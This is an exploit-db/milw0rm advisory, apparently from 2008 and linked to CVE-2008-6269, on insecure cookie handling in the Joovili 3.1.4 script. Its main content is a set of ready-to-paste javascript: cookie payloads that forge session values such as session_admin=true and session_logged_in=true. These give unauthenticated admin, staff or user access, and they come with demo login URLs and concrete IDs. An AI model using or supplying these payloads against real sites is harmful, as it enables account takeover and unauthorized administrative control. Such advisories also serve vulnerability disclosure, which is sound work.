Lucene search
ZoRLuEDB-ID:6955HistoryNov 02, 2008 - 12:00 a.m.
Joovili 3.1.4 - Insecure Cookie Handling
2008-11-0200:00:00
ZoRLu
www.exploit-db.com
21
AI Score
7.4
Confidence
Low
[~] Joovili Script Insecure Cookie Handling Vulnerability
[~]
[~] version: 3.1.4
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 02.11.2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] contact: [email protected]
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] N0T: a.q kpss : ) )
[~]
[~] ----------------------------------------------------------
demo admin login:
http://demo.joovili.com/admin
demo user login:
http://demo.joovili.com/
demo staff login:
http://demo.joovili.com/staff/
exploit for user:
javascript:document.cookie = "session_id=real_id; path=/"; document.cookie = "session_logged_in=true; path=/"; document.cookie = "session_username=real_user_name; path=/";
for demo user:
javascript:document.cookie = "session_id=304; path=/"; document.cookie = "session_logged_in=true; path=/"; document.cookie = "session_username=demo; path=/";
for demo admin:
javascript:document.cookie = "session_admin_id=1; path=/"; document.cookie = "session_admin_username=admin; path=/"; document.cookie = "session_admin=true; path=/";
for demo staff:
javascript:document.cookie = "session_staff_id=3; path=/"; document.cookie = "session_staff_username=staff; path=/"; document.cookie = "session_staff=true; path=/";
[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & all Muslim HaCkeRs
[~]
[~] yildirimordulari.org & darkc0de.com
[~]
[~]----------------------------------------------------------------------
# milw0rm.com [2008-11-02]Related
cvelist
cvelist
CVE-2008-6269
2009-02-25 11:00:00
cve
cve
CVE-2008-6269
2009-02-25 11:30:00
nvd
nvd
CVE-2008-6269
2009-02-25 11:30:00
prion
prion
Authentication flaw
2009-02-25 11:30:00